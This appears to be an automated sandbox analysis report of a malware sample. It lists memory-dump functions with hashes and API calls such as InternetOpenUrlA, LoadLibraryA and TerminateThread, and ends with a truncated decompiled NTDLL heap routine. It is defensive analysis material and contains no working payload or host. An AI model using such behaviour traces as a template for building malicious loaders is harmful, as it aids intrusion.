Opcode ID: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
Instruction ID: 5fc600a6af3f323a45716e9acb4398a2fcbbb0e08e333fab3749652b2ca3d10d
Opcode Fuzzy Hash: c0edc678dd3d5412f20d53957556f8b7131a364210a75e2bd36b31d63249d0ff
Instruction Fuzzy Hash: D690027520100446D100659A540C74A000557E0741FD2D121E5114515EC6A988917172

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E97AA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
Instruction ID: 25bc4bfb324759299ade31a33d5159a6e8e48ae3f7e15096fe26cf15f60d6853
Opcode Fuzzy Hash: 3956742ed3e9cbb02a74ed11bd24d824239a098825e83590657b4044ea83299f
Instruction Fuzzy Hash: 5B90026530100047D140715A541C70A4005A7E1741FD2D121E0504514CD95988567263

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E978A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
Instruction ID: 7218c6ae9a9795bd688dc2b845c83eaf637acedee432c69d384e3f0db6ef6955
Opcode Fuzzy Hash: d16f4fb0795ce0abd0189d26f387d24d5149582027f8353b3ac1fdf1dde9752c
Instruction Fuzzy Hash: A590026D21300046D180715A540C70E000557D1642FD2D525E0105518CC95988697362

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9FEA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 442066ba89d695ae507c5947914a11d3325133a74548763c0865e483b2cce999
Instruction ID: be230081d056d244b22ac22af3a129ae37026e2b6f298dddeddc129d3434754a
Opcode Fuzzy Hash: 442066ba89d695ae507c5947914a11d3325133a74548763c0865e483b2cce999
Instruction Fuzzy Hash: C190027531114446D110615A840C70A000557D1641FD2C521E0914518D86D988917163

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E954A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
Instruction ID: 3d6bcd29db30a9c90b61d314f917a7bc5ab90e31f4c78ac367c30708842e5934
Opcode Fuzzy Hash: ed7caeb51d3f096c5f4db7676034fc1b4b44d2d4d003d105f155e246832629e9
Instruction Fuzzy Hash: 13900269211000470105A55A070C60B004657D57913D2C131F1105510CD66588617162

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E95DA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
Instruction ID: 8983f75615fa2ed9070e6cd829f26b482c119897463b970db5b50ed9756d2c42
Opcode Fuzzy Hash: f6de2f58bc787ee59dc09b4e11d17d319e20783fae9a41ede6624d071cc5e8bb
Instruction Fuzzy Hash: F29002A5202000474105715A441C71A400A57E0641BD2C131E1104550DC56988917166

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9A2A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
Instruction ID: 18942b807acc254915c7b78de4a9cac9840f5fe70b254e852201c28d7f370801
Opcode Fuzzy Hash: 3d4143669bf56121ab1058549018bf11846bb2b7bde5e0fcf140fefe55ec85c0
Instruction Fuzzy Hash: 33900265601000864140716A884CA0A40057BE16517D2C231E0A88510D859D886576A6

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9A0A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
Instruction ID: cd2b128d49c6411cd359937003ae9657be47472803a458235b6b77519b4d4330
Opcode Fuzzy Hash: 6f5aa90c4fde1163df9d3b0cd01729496fd40d5791884164604994c8a34979b9
Instruction Fuzzy Hash: CF90027520140446D100615A481C70F000557D0742FD2C121E1254515D8669885175B2

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9A5A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
Instruction ID: 3dd0743f8cca69710d495101eb44dbe0d7c3cc4d783647bcdd174005a1f54694
Opcode Fuzzy Hash: d620945f3e693cf8d05b7a8986f933a5c54ab6b53c7a408285ef10d8ef515b10
Instruction Fuzzy Hash: 8F90026521180086D200656A4C1CB0B000557D0743FD2C225E0244514CC95988617562

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E986A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
Instruction ID: d22d96c8685158c6026a1d134419228c9a8dfbdc279ce50e2382c8d051fda9eb
Opcode Fuzzy Hash: 9ea5c7306628ce1d6058e4ddc637eb67d249358dbfd2a1a8833a820a90bb82e1
Instruction Fuzzy Hash: 7490027520100457D111615A450C70B000957D0681FD2C522E0514518D969A8952B162

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E984A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
Instruction ID: 43be0823cd91e2b2ff088d531b3c57b0027198cb802e625b1c6a8a73bb32927a
Opcode Fuzzy Hash: 69e20f55a7cee8b65ebd4758792e5615dea4655f1a47a69fcd8b631bdc609159
Instruction Fuzzy Hash: AC900265242041965545B15A440C60B400667E06817D2C122E1504910C856A9856F662

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E98FA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
Instruction ID: 6eeb228c800cb474f21126f290c8bdf9585a85ca8901061fdf0fa7bbe728e60c
Opcode Fuzzy Hash: 1326f8abf98fbe46a941b67f064e7e3e2f74c9e0559b3bfcbb0fbcb1c62aa70d
Instruction Fuzzy Hash: D090026560100546D101715A440C71A000A57D0681FD2C132E1114515ECA698992B172

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E991A

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
Instruction ID: e848538c7147f08df8a62953956afbeb529c3dc9331f5e3088af2dec7a848549
Opcode Fuzzy Hash: 8b7fe07b8690245136066acd7667b25e5ee4685ba7f8d17408db480af51850b5
Instruction Fuzzy Hash: 6E9002B520100446D140715A440C74A000557D0741FD2C121E5154514E869D8DD576A6

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E99AA

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
Instruction ID: f8c79112a0a005290d856babf543b472d98c99dbf692046d7d7bee1e16db80aa
Opcode Fuzzy Hash: f87a3d4879f8736d4111da5a72d221364743103b361ee279bc3e818d2f22df1f
Instruction Fuzzy Hash: DD9002A534100486D100615A441CB0A000597E1741FD2C125E1154514D865DCC527167

Uniqueness

Uniqueness Score: -1.00%

Function 00561AB4, Relevance: 3.3, APIs: 2, Instructions: 342threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000,0000E1A6), ref: 00561AFF

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: acd48b3ec64c7c9ca9f832e0e6660c570d5141a61263cf6c5f813761c4ba6482
Instruction ID: 2191879e169c005a730de78f1fa224e13530252883fbf8c7ca8ab93e5dc8065a
Opcode Fuzzy Hash: acd48b3ec64c7c9ca9f832e0e6660c570d5141a61263cf6c5f813761c4ba6482
Instruction Fuzzy Hash: B9C102B0240606AFEF305F14CC5ABEA3E61FF55714F244224FE85AB2D1C7B99988DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00562992, Relevance: 3.1, APIs: 2, Instructions: 98networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00562F3A,00000000,00000000,00000000,00000000), ref: 0056299C
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00562A93

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c020128dbc645229cfa398eb1cb92a38e5a95858a9eaf5daf1b1b5d22decfd0c
Instruction ID: f37f7f8ba7a7691df2696fecade56db78f8aa06b9085f037e790cd42365343aa
Opcode Fuzzy Hash: c020128dbc645229cfa398eb1cb92a38e5a95858a9eaf5daf1b1b5d22decfd0c
Instruction Fuzzy Hash: F131813028478BABEF314E50CD85BEE3B65FF00340F108425FE4AAB590E7B19A44EB21

Uniqueness

Uniqueness Score: -1.00%

Function 005611E3, Relevance: 2.6, APIs: 1, Instructions: 1060threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000,0000E1A6), ref: 00561AFF

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 5c571a1a744d0ebf1c4b9bd9da9af866b529846daf12b633ec52545f415f143e
Instruction ID: c361ca957859eb519f7566c25c172fe7487b14bbf0f2ec0616457c77746ff764
Opcode Fuzzy Hash: 5c571a1a744d0ebf1c4b9bd9da9af866b529846daf12b633ec52545f415f143e
Instruction Fuzzy Hash: 471100B0501B01AFD7218B69CD99F693F54BF1A331F2843D1E9568B1F2DA70D880CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00562A5C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d4db3269de09f0dc78d04b4efc791498e092fe17d402f554d658c8185964760
Instruction ID: 3111242e43642083ef91ceb8669a63def4b440f91b86eea92e47c0e0ef3927d5
Opcode Fuzzy Hash: 8d4db3269de09f0dc78d04b4efc791498e092fe17d402f554d658c8185964760
Instruction Fuzzy Hash: 4231F2712447879FDB328E60CC947EA7FA1FF45300F148565DC818F6A1D3B0A886EB61

Uniqueness

Uniqueness Score: -1.00%

Function 005629A4, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00562A93

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 28ff7b672af35a73bf90722aea54f91236b6346d65fa2254013b05eb35014b93
Instruction ID: 91ead66949e7b25b1b99f0f249ad662ea34ddc467bb14a3a19ab7a99d182c3f2
Opcode Fuzzy Hash: 28ff7b672af35a73bf90722aea54f91236b6346d65fa2254013b05eb35014b93
Instruction Fuzzy Hash: 6C21AE71244B4AEFEB354F50CD89BEA3B64FF00380F148814ED4A9B5A5E7B19989DF20

Uniqueness

Uniqueness Score: -1.00%

Function 00561BAC, Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,005625E4,?), ref: 00563D7E

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c6fd4fae8a62e88ad93eb4208b91f65441429ae2c763f6dd99bec959f4aaed91
Instruction ID: 50a28a4559f1e81ad535158631afa327059669a781df91934c241de9a21f783a
Opcode Fuzzy Hash: c6fd4fae8a62e88ad93eb4208b91f65441429ae2c763f6dd99bec959f4aaed91
Instruction Fuzzy Hash: F3110B60744A429FEF346F78D984BB93E61FF52364F148768F8928B387D720C9858786

Uniqueness

Uniqueness Score: -1.00%

Function 00561AC7, Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000,0000E1A6), ref: 00561AFF

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: dd5cd9c496040acd1e6cfed7fdf342478653a9d635cb93f7219b59da4d1366bb
Instruction ID: c42396d8a5b94e742fe29ecfd23038c2e41cf20e1dc88d2cc053cfdff7c5ab21
Opcode Fuzzy Hash: dd5cd9c496040acd1e6cfed7fdf342478653a9d635cb93f7219b59da4d1366bb
Instruction Fuzzy Hash: 1111A371A01A00EFD7255B55C849B997F64FF0A330F248690E9668F5F6E670D8C1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00562A03, Relevance: 1.6, APIs: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00562A93

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 436aaa0ce1c92a527406a2cfdee959320ff56f10b352c26cd826d1de850814c7
Instruction ID: de1560461838564e00bdbcc823a83ba8250b76663d829e2a31145377ee7e24ea
Opcode Fuzzy Hash: 436aaa0ce1c92a527406a2cfdee959320ff56f10b352c26cd826d1de850814c7
Instruction Fuzzy Hash: D3219D71244786EFDB358F50CC88BEA3B64FF04340F148824ED469B9A5E3719885DF21

Uniqueness

Uniqueness Score: -1.00%

Function 0056243D, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,005625E4,?), ref: 00563D7E

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a5979a02631452f6ed864d98319808c75c18f62848ff6f5090352167c4095b93
Instruction ID: 1e0e88994d782ac797c5de8e4f2e4867e33c09a1a23d9b430ef75f372f413baf
Opcode Fuzzy Hash: a5979a02631452f6ed864d98319808c75c18f62848ff6f5090352167c4095b93
Instruction Fuzzy Hash: 4501D2B1A045049FCB393B50D4097E92F34FF517A0F209D50F8525B12AE6108DCA4ED2

Uniqueness

Uniqueness Score: -1.00%

Function 00563C87, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,005625E4,?), ref: 00563D7E

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2336b91b872bc9aa5390d7a149dfb778d4b5e266ae6f85c92d2bd273312c259c
Instruction ID: 861412f62a006a4a42a9dddfb21ebec67bd89fa6982e8002d2ed1f5c8c4b5c97
Opcode Fuzzy Hash: 2336b91b872bc9aa5390d7a149dfb778d4b5e266ae6f85c92d2bd273312c259c
Instruction Fuzzy Hash: 64F06DB1A04544DFC7293B50D40D2E86F34FF01390F109D50F8628B42EE7205ACA4E96

Uniqueness

Uniqueness Score: -1.00%

Function 00563CC3, Relevance: 1.5, APIs: 1, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,005625E4,?), ref: 00563D7E

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b1188da7b3fb96e0b86ecbaa298ea14919b841051ec762e030bb513dc3af41d8
Instruction ID: c66e975fa7bffaf3ee09933f3451e1f36e17609955023f48287c49e236af51b6
Opcode Fuzzy Hash: b1188da7b3fb96e0b86ecbaa298ea14919b841051ec762e030bb513dc3af41d8
Instruction Fuzzy Hash: 42F06D71A04545DFC7293B50D40D2A8BF34FF42390F149D51B8A28B52EE72149DA4F92

Uniqueness

Uniqueness Score: -1.00%

Function 00563D3D, Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,005625E4,?), ref: 00563D7E

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d7858a88e6c0bf0a479c8c2a706b16b7109f5a1fef7d92d4cb14b4bced4698a3
Instruction ID: 0137c6d26b6979ee50f81da22dcbd496252c0c4231224f65b5aba16e1b63b0d1
Opcode Fuzzy Hash: d7858a88e6c0bf0a479c8c2a706b16b7109f5a1fef7d92d4cb14b4bced4698a3
Instruction Fuzzy Hash: 4FF01DB2A05240EF83672B61D40D0C87F34FE06690358D890A8628A93EF66119DB8FE2

Uniqueness

Uniqueness Score: -1.00%

Function 00563CFF, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,005625E4,?), ref: 00563D7E

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0495954a697af0204cc6a7031dfb207d7530c0ad2e6e74e522ea0deada3908a0
Instruction ID: 519223ea88726c58d0c309b6c1b64f0594d8ed7f52181eff506ab57efc3cbf9a
Opcode Fuzzy Hash: 0495954a697af0204cc6a7031dfb207d7530c0ad2e6e74e522ea0deada3908a0
Instruction Fuzzy Hash: 17F03AB2A04540DF876A2B51D40E1D8BB34EE01650B14DD50A8A24A53EE22059DA4FD2

Uniqueness

Uniqueness Score: -1.00%

Function 00563CB3, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(0000C961,00000000,?,005625E4,?), ref: 00563D7E

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 58cbc671953dc9767fb7ade38ddf4ad32e45973a49e43bc97bdf4d67ef4f1445
Instruction ID: e573354157fa859b85d51fdd42e240e727f992c27f38d9c635c63870625b6b7a
Opcode Fuzzy Hash: 58cbc671953dc9767fb7ade38ddf4ad32e45973a49e43bc97bdf4d67ef4f1445
Instruction Fuzzy Hash: CAE04890544559A9DF243760AC59BBE1D34FF923D0F105A15F99187102C714CBC95DDB

Uniqueness

Uniqueness Score: -1.00%

Function 00562725, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,005626D0,0056274F), ref: 0056273B

Memory Dump Source

Source File: 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 155ab0be908f0c9073ab6786d2919a755303e86cfda44655917ade1c814518c9
Instruction ID: 900367366cdbe6d601c81150bc681f02e6b68b9561d5aa492e1afc5f48836694
Opcode Fuzzy Hash: 155ab0be908f0c9073ab6786d2919a755303e86cfda44655917ade1c814518c9
Instruction Fuzzy Hash: 9EC04C713D1300B6FA384A219D56F9A62155B90F01F20841C7F467D0C186F1A620D518

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E3E9694

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
Instruction ID: ee8f6295c3d00ad3366357643f49832a070fdd6ca318626694bc1ea0cc8d5a11
Opcode Fuzzy Hash: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
Instruction Fuzzy Hash: 80B09B719014D5C9D611D761460C71B790177D0751F97C2A2D1120641E477CC0D1F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1E462D82, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 228
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E1E462D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1e480e80);
				E1E3FD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E1E3A40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E1E4630C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E1E3AB150();
						} else {
							E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E1E3AB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
